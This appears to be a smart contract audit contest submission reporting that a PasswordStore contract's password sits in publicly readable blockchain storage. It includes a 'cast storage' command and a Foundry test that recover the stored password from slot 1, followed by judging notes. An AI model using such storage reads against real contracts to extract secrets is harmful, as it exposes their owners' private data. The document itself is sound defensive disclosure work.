Submission Details
Severity:
Password is publicly accessible
Summary
All data in blockchain is public which means that anyone can read it.
Vulnerability Details
Password variable s_password is stored in publicly accessible storage - everything stored in the blockchain is public.
Reproduction step:
cast storage <constract-address> 1 | cast parse-bytes32-string
Impact
Since the main goal of the contract is to store that password securely this vulnerability has a severe impact.
/*
* This POC test will work for password strings smaller than 32 bytes.
* For longer strings the test would have to be modified.
*/
function test_password_is_public() public {
uint256 slot = 1;
bytes32 memoryData = vm.load(
address(passwordStore),
bytes32(slot)
);
// removing the last byte where lenght of the data is stored
bytes32 recoveredPassword;
assembly {
recoveredPassword := and(memoryData, not(0xff))
}
vm.startPrank(address(owner));
string memory actualPassword = passwordStore.getPassword();
// converting string to bytes32 and comparing comparing bytes32 to bytes32
assertEq(
bytes32(bytes(actualPassword)),
recoveredPassword
);
}
Tools Used
Foundry/cast
Recommendations
Do not store private data on the blockchain.
Updates
Lead Judging Commences
inallhonesty
about 2 years ago
inallhonesty about 2 years ago
Submission Judgement Published Assigned finding tags:
finding-anyone-can-read-storage
Private functions and state variables are only visible for the contract they are defined in and not in derived contracts. In this case private doesn't mean secret/confidential
Rewards breakdown
nSLOC
20This contest has a flat reward structure with the following payouts:
100 EXP
20 EXP
2 EXP
Live
The contest is live. Earn rewards by submitting a finding.
Appeals
This is your time to appeal against judgements on your submissions.
Appeals Review
Appeals are being carefully reviewed by our judges.